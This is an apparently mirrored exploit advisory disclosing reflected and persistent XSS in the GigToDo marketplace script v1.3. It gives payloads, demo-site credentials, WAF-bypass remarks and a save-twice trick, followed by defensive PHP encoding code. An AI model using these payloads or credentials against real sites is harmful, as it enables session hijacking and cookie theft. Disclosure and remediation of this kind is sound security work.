GigToDo - Freelance Marketplace Script v1.3 Reflected & Persistent XSS Injections

CVE: -
Category: CWE-79
Price: Not specified
Severity: High
Author: Exploit Alert Team
Risk: High
Exploitation Type: Remote
Date: 2019-07-29
CVSS: Not provided
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019070144

Below is a copy:

/*!
* # Exploit Title: GigToDo - Freelance Marketplace Script v1.3 Reflected & Persistent XSS Injections
* # Google Dork: -
* # Date: 2019/07/28
* # Author: m0ze
* # Vendor Homepage: https://www.gigtodoscript.com
* # Software Link: https://codecanyon.net/item/gigtodo-freelance-marketplace-script/23855397
* # Version: <= 1.3
* # Tested on: NginX/1.15.10
* # CVE: -
* # CWE: CWE-79
*/

::- Details & Description -::
~ The GigToDo - Freelance Marketplace Script web application is vulnerable to reflected and persistent XSS injections that allow an attacker to inject JavaScript/HTML code into the front end, redirect visitors to another website, or steal admin cookies.

::- Demo Website -::
~ Frontend: https://www.gigtodo.com
~ Frontend (auth): https://www.gigtodo.com/login.php
~ Login / Password (buyer/seller) #1: pat / Pat
~ Login / Password (buyer/seller) #2: patricia / Pat
~ Login / Password (buyer/seller) #3: tyrone / Pat
~ Login / Password (buyer/seller) #4: jess / Pat

::- Special Note -::
~ Web-application price is $175, 14 Sales.
~ "Script is fully protected from SQL Injection and XSS." - Pixinal_Studio (web-app author)
~ "When you purchase the script, as long as you do not share your admin credentials, you are completely protected. Hope this makes sense?" - Pixinal_Studio (web-app author)
~ On the demo website you'll face the Mod_Security WAF, which it is possible to bypass. There is no guarantee that customers will use any kind of WAF, so the entire exploitation process may be much easier. Plus, most of the time users really don't care about security, so passwords for the admin area can be brute-forced or the admin session can be hijacked via the XSS attack vector. At this point, the possibility of creating an executable .PHP file with user content inside is a huge security breach and a time bomb in the design of any web app.
~ Disabling any data changes on a demo website doesn't make your application more secure. It's good for business and sales, but you are simply double-crossing your clients. The same applies if you do not acknowledge the breaches in the web-app design, putting your ego above the safety of your customers.

::- PoC Links -::
~ https://www.gigtodo.com/proposals/demouser/lth1gtdemolth1gt
~ https://www.gigtodo.com/proposals/tyrone/i-will-create-beats-for-you

::- PoC [Reflected XSS Injection] -::
~ For the reflected XSS injection, use the search bar or go to the https://www.gigtodo.com/search page and use a payload like one of those listed below.
~ Example #1: <img src='x'+/onerror=(alert)('m0ze')>
~ Example #2: <body +/onload=(alert)('m0ze')>m0ze</body>
~ Example #3: <body +/onload=(alert)(document.cookie)>m0ze</body>
~ Example #4: <svg/onload='window.open(`https://twitter.com/m0ze_ru`);'>

::- PoC [Persistent XSS Injection] -::
~ Register a new account or use one of the accounts provided for the demo website: pat / Pat || patricia / Pat || tyrone / Pat || jess / Pat. Log in and go to the https://www.gigtodo.com/proposals/create_proposal page. The vulnerable text area is the Proposal's Description, so paste your payload inside, fill in the other fields and save the data TWICE (if you don't understand why, read the Important Stuff below).
~ Example #1: <h1 onmouseover=';alert(`m0ze`);'>m0ze</h1>1"--><svg/onload=';alert(`Script is fully protected from SQL Injection and XSS `);'><img src='x' onerror=';alert(`For sure lol`);'>
~ Example #2: <h1 onmouseover=';alert(`Greetz from m0ze`);'>m0ze</h1>1"--><svg/onload=';window.location.replace(`https://twitter.com/m0ze_ru`);'>

::- PoC [Important Stuff] -::
~ Keep in mind that you need to save your payload inside the Proposal's Description text area TWICE or your payload WILL NOT WORK. So literally paste your payload inside the Proposal's Description text area, scroll down to the Update Proposal button and press it; your data will be saved. After that you'll be redirected to the https://www.gigtodo.com/proposals/view_proposals.php page. Select your created proposal, press the green square dropdown menu on the right (Actions column) and click on the Edit link. Then, without changing anything, scroll down to the Update Proposal button and press it; your data will be saved ONE MORE TIME. That's it, now your payload will work.
~ If you are using any redirects inside the payload, then DISABLE JS WHILE YOU EDIT YOUR PROPOSAL or you will not be able to re-save the data. And don't forget that you can use links with your proposal ID to edit it ( https://www.gigtodo.com/proposals/edit_proposal?proposal_id=XX ).
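Both sinks named in this advisory, the reflected search term and the persistent Proposal Description, are the same class of defect: untrusted text reaching an HTML context without contextual output encoding. The following is an added defensive example written for this page, not GigToDo's own code; all function and parameter names are assumptions, and the only app-specific value is the first reflected payload quoted above, used here purely as test input. It shows the vulnerable echo beside the hardened one, and why encoding at render time (rather than at storage time) is unaffected by the "save twice" round trip through the edit form, since the stored text is never trusted no matter how many times it was re-saved.

```php
<?php
// Added defensive example (not part of the GigToDo project). Demonstrates
// contextual output encoding for the two sinks the advisory describes.
// Names such as h(), search_heading() and render_description() are assumed.
declare(strict_types=1);

// Encode a string for an HTML text or quoted-attribute context.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid
// UTF-8 instead of returning an empty string, which would silently drop content.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Reflected sink, vulnerable form (for contrast only): the raw query
// parameter is interpolated straight into markup.
function search_heading_vulnerable(string $q): string
{
    return "<h2>Results for: $q</h2>";
}

// Reflected sink, hardened form: encode at the point of output.
function search_heading(string $q): string
{
    return '<h2>Results for: ' . h($q) . '</h2>';
}

// Persistent sink: keep the description as the user submitted it.
// Validation (length, allowed characters) is a separate concern from
// encoding; storing pre-encoded text is what makes edit/re-save cycles fragile.
function store_description(string $raw): string
{
    return $raw;
}

// Render the stored description for visitors. Encoding is idempotent with
// respect to how many times the value was saved, because the stored text is
// treated as data every time it is rendered.
function render_description(string $stored): string
{
    return '<p class="description">' . nl2br(h($stored)) . '</p>';
}

// Edit form: the textarea body is an HTML text context too, so the author's
// own saved payload is shown to them verbatim without being interpreted.
function edit_form_textarea(string $stored): string
{
    return '<textarea name="description">' . h($stored) . '</textarea>';
}

// Constructed input: the first reflected payload quoted in the advisory.
$payload = "<img src='x'+/onerror=(alert)('m0ze')>";

echo search_heading($payload), PHP_EOL;
// <h2>Results for: &lt;img src=&#039;x&#039;+/onerror=(alert)(&#039;m0ze&#039;)&gt;</h2>

$stored = store_description($payload);
echo render_description($stored), PHP_EOL;
echo edit_form_textarea($stored), PHP_EOL;
```

If the product genuinely needs rich HTML in descriptions, the encoder above is the wrong tool and an allowlist sanitizer (for PHP, HTML Purifier) should run on the stored value at render time instead; blocklisting tags or event-handler names is exactly the kind of filter the advisory's payload variants are built to walk around. Independent of the encoding fix, marking the admin session cookie HttpOnly and serving a Content-Security-Policy that disallows inline script reduce what a surviving injection can do, which addresses the cookie-theft and redirect impacts the advisory lists.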

Copyright ©2024 Exploitalert.
